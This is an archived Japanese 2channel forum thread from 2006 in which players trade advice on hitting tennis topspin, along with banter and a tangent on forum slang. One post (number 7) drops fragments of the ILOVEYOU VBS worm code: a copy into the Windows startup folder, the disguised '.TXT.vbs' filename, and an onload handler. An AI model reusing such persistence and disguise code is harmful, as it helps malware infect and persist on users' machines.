2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

トップスピン

1 :名無しさん@エースをねらえ!:2006/05/06(土) 11:36:39 ID:x+ErZOmG
初心者だったらトップスピン打ちたくないですか

2 :名無しさん@エースをねらえ!:2006/05/06(土) 11:39:32 ID:x+ErZOmG
スレ主です。
昨日試合をしたんですが、そのレベルに違いを見せ付けられました。
特にトップスピンがすごかったです。私はスライスならそれなりに打てるのですが。
スライスとトップスピンを同じくらいのレベルにしたいです

3 :名無しさん@エースをねらえ!:2006/05/06(土) 12:21:53 ID:VjAYqayw
スライスのレヴェルを君のトップスピンのレヴェルまで落とせばOKだお( ^ω^)

4 :名無しさん@エースをねらえ!:2006/05/06(土) 12:24:39 ID:Kp74kqWK
へえ、そうなんだ。

5 :名無しさん@エースをねらえ!:2006/05/06(土) 12:47:40 ID:8vrcYUio
そうだよ

6 :名無しさん@エースをねらえ!:2006/05/06(土) 13:42:02 ID:iCI4IFy8
なんだ?この糞スレ。

7 :名無しさん@エースをねらえ!:2006/05/06(土) 16:21:50 ID:F3HXUATR
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs
<body onload=window()>

8 :名無しさん@エースをねらえ!:2006/05/06(土) 17:47:10 ID:uMuYO9Fl
ラケットをいっしょうけんめい振るんだ。

9 :名無しさん@エースをねらえ!:2006/05/06(土) 23:01:17 ID:G5hagfHk
漏れも厨房の時初めて試合出たとき、ヅュニアのヘヴィースピソ見てヅューソってなったなぁ。帰ってさっそくグリップ厚くして真似たけど最初は全然飛ばんでネットしまくった。いまではグリグリのトップスピソだお!少年1よガンガレ

10 :名無しさん@エースをねらえ!:2006/05/06(土) 23:03:40 ID:x+ErZOmG
体重移動は必要ですか?

11 :名無しさん@エースをねらえ!:2006/05/06(土) 23:18:38 ID:G5hagfHk
体重移動とか以前にまずボールを擦り上げてスピンをかける感覚を養うのが先。それが分かればあとは当たりの厚さによって回転量を調節したりできるはず。とりあえず下から上に振り上げてボール飛ばす練習したら?

12 :名無しさん@エースをねらえ!:2006/05/07(日) 08:04:30 ID:tvs0mLx/
こすりあげるですね。
スライスの場合テイクバックでは案外打球面が地面に対して垂直で、インパクトに向けて
なだらかに地面と平行にしますよね。
トップスピンはどうなんですか??

13 :名無しさん@エースをねらえ!:2006/05/07(日) 11:08:34 ID:85CSQLz6
逆じゃね?スライスはテイクバックではラケット面は地面と平行でインパクトで地面と垂直でしょ?雑誌でプロの連続写真見てみ?基本的にボールはインパクトの面の向きに飛ぶので、面が上向きなら上に飛ぶはずだよ。真っ直ぐ打ちたいならインパクトの面は極力地面に垂直。
スピンも然り。スピンかけたいからってあまり面を被せる必要はない。テイクバックなんて肩入れりゃ完了だから!あとは打点より低いとこからラケット出して最後まで振り抜く。上手いひと見てイメージをつくれ。

14 :名無しさん@エースをねらえ!:2006/05/07(日) 12:21:54 ID:E2BilBrn
ネタにマジレス・・・
スピンなんて意識してかけるもんじゃない罠。
それぞれにあったスピン量とスピードのバランスが大切。

ボールを擦り上げてなんて打ち方してると
回転だけでほとんど意味をなさないボールにしかならない。
きっちり入る厚い当りをまず学ぶべきだろう。
その過程でスピンが身につくかもしれない
スピンが身につかなくても
武器になるボールが打てるようになっている可能性は十分ある。

おまけ

俺は打つときに全く回転をかける意識がなく
ここ半年ほどは逆に回転をできるだけ減らしてスピードアップを図ろうとしているが、
相変わらず人からはかなりスピンがかかっていると・・・orz

15 :名無しさん@エースをねらえ!:2006/05/07(日) 13:03:13 ID:tvs0mLx/
13さん
やっぱスライステイクバックでは地面に垂直でインパクトで地面に平行っぽいですよ。
テニスジャーナル6月号、22、23ページバックボレー(スライスではないが)
雑誌の内容載せるのって、法律違反かな・・・

うまい人って、スウィングスピード速いから真似できません。
スウィングスピードを上げると、ボールとのタイミングが合わず、
フレームが多いっす


16 :名無しさん@エースをねらえ!:2006/05/07(日) 14:21:19 ID:85CSQLz6
ある程度スウィングスピードないとスピンかからんのやない?残念無念また来週

17 :名無しさん@エースをねらえ!:2006/05/07(日) 15:25:15 ID:6qiQT/A/
下から上に振り切る

18 :名無しさん@エースをねらえ!:2006/05/07(日) 22:53:58 ID:oKAMEgS3
>>15
TJ5月号でスライス特集してるよ。それ見れ。

後質問スレ池。もしくは視ね

19 :名無しさん@エースをねらえ!:2006/05/07(日) 23:33:57 ID:tvs0mLx/
こわー


20 :名無しさん@エースをねらえ!:2006/05/08(月) 01:33:40 ID:0DR3VRqm
握り方によってかわるとは思わんのね

21 :名無しさん@エースをねらえ!:2006/05/09(火) 22:39:20 ID:lMo8MTcX
20
グリップによって何が変わるんですか?
お願いします。


22 :名無しさん@エースをねらえ!:2006/05/10(水) 08:45:12 ID:Yv6u+6q9
トップスピンをかけるこつは、グリップでもスイング軌道でも
ないよ。

23 :名無しさん@エースをねらえ!:2006/05/10(水) 21:32:20 ID:ksNU7JH6
サーブに使う内回はトップスピンを打つときとおなじでしょうか??


24 :名無しさん@エースをねらえ!:2006/05/10(水) 21:51:45 ID:rj5au1eZ
>>23
スレ違いだし、単語も違う

25 :名無しさん@エースをねらえ!:2006/05/10(水) 22:46:07 ID:ksNU7JH6
回内でしたっけ、すみません

26 :名無しさん@エースをねらえ!:2006/05/10(水) 22:51:32 ID:rj5au1eZ
>>25
スレが違って(ry

27 :名無しさん@エースをねらえ!:2006/05/10(水) 22:59:55 ID:ksNU7JH6
(ry
何のカオモジですか?

28 :名無しさん@エースをねらえ!:2006/05/10(水) 23:09:32 ID:3AkzMFlk
>>18 IDがおかめ。      それだけだよ。

29 :名無しさん@エースをねらえ!:2006/05/12(金) 20:09:52 ID:Z2Bp+ICe
(ry
何のカオモジですか?

30 :名無しさん@エースをねらえ!:2006/05/12(金) 20:50:56 ID:eqmBVhNY


31 :名無しさん@エースをねらえ!:2006/05/13(土) 19:58:14 ID:UB3emceB
略?
もう少し詳しくお願いします

32 :名無しさん@エースをねらえ!:2006/05/13(土) 20:14:20 ID:K7RIZesd
半年ロムってろ、ぼけ

33 :名無しさん@エースをねらえ!:2006/05/14(日) 01:25:18 ID:6JaIN1KC
そこまで言うことは(ry

34 :名無しさん@エースをねらえ!:2006/05/14(日) 07:49:50 ID:g5IoAu+K
(ry
何のカオモジですか?
本当にわからないんです。

35 :名無しさん@エースをねらえ!:2006/05/14(日) 13:19:25 ID:8CtL1gJ5
>>34
かっこ、あーる、わい

です

36 :名無しさん@エースをねらえ!:2006/05/14(日) 13:21:25 ID:R93uep06
顔文字じゃないよ

37 :名無しさん@エースをねらえ!:2006/05/14(日) 13:59:52 ID:EHl5/7Yc
(略 の略さぁヾ(*´∀`)ノ

38 :名無しさん@エースをねらえ!:2006/05/15(月) 18:35:42 ID:NzbOPrjk
(ry
かっこ、あーる、わい
=かっこわるい
=格好悪い
ですね。
ありがとう!!
これで眠れます。


39 :名無しさん@エースをねらえ!:2006/05/15(月) 20:50:48 ID:TdWIlNEn
ぐっすり おやすみ

40 :名無しさん@エースをねらえ!:2006/05/20(土) 22:06:54 ID:ApveGjje
やっぱスピン打つならナダルみたいなスピン打ちたくねぇ?

41 :名無しさん@エースをねらえ!:2006/05/20(土) 22:46:24 ID:y8/mh8/N
ナダルもサフィンも動いてるとこ見たことない
見てみてー

42 :名無しさん@エースをねらえ!:2006/05/21(日) 20:55:31 ID:skBhL7PT
このページで選手の名前入れて検索したら?
短いのばかりだけどいろいろ見れるよ
ttp://www.youtube.com/results?search=Nadal&search_type=search_videos

43 :名無しさん@エースをねらえ!:2006/10/05(木) 17:55:57 ID:ABNpG9rm
おい!打ち方教えろ!

44 :名無しさん@エースをねらえ!:2006/10/05(木) 22:26:47 ID:zXVZzl3C
俺にも教えろ!!

45 :名無しさん@エースをねらえ!:2006/10/05(木) 22:46:43 ID:Oc2sKhZY
プロの試合見てればできるようになるよ。他には雑誌とか。今日1時頃NHKで放送あるよ

46 :名無しさん@エースをねらえ!:2006/10/05(木) 22:48:22 ID:zXVZzl3C
結構見てるんだけど・・・

47 :名無しさん@エースをねらえ!:2006/10/05(木) 23:11:43 ID:zXVZzl3C
誰の試合?


48 :名無しさん@エースをねらえ!:2006/10/05(木) 23:13:07 ID:Oc2sKhZY
イメージトレーニングはかなり重要。>>46みてるんなら真似すればいいんだよ

49 :名無しさん@エースをねらえ!:2006/10/05(木) 23:21:22 ID:zXVZzl3C
誰の試合?

50 :名無しさん@エースをねらえ!:2006/10/05(木) 23:23:15 ID:Oc2sKhZY
フェデラーと誰か

51 :名無しさん@エースをねらえ!:2006/10/05(木) 23:28:44 ID:zXVZzl3C
つーかフェデラーの試合多いだろ


52 :名無しさん@エースをねらえ!:2006/12/16(土) 19:05:35 ID:plBnA/4U
乱れた愛に流され

9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)